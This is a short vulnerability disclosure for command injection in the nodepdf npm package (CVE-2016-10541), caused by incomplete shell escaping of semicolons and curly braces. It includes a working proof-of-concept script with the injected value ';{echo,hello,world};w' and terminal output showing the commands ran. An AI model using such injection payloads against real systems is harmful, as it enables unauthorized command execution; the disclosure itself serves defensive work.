Software: nodepdf
Website: https://github.com/TJkrusinski/NodePDF
Input passed to the Pdf() function is shell-escaped and then passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely semicolons and curly braces. This can be abused to achieve command execution.
This vulnerability was later fixed in the shell-escape library and assigned the identifier CVE-2016-10541.
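// render.js
var nodepdf = require('nodepdf');
// The semicolons and curly braces in this value are not encoded by the shell escape
var url = ";{echo,hello,world};w";
var filename = "output.pdf";
var pdf = new nodepdf(url, filename, {});
// Print whatever the spawned command writes to stdout and stderr
pdf.on('stdout', console.log);
pdf.on('stderr', console.error);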
$ npm install [email protected]
$ node render.js
11 incorrect args
hello world
03:31:25 up 19 days, 16 min, 1 user, load average: 0.15, 0.15, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user pts/0 192.168.1.64 02:38 0.00s 0.31s 0.00s w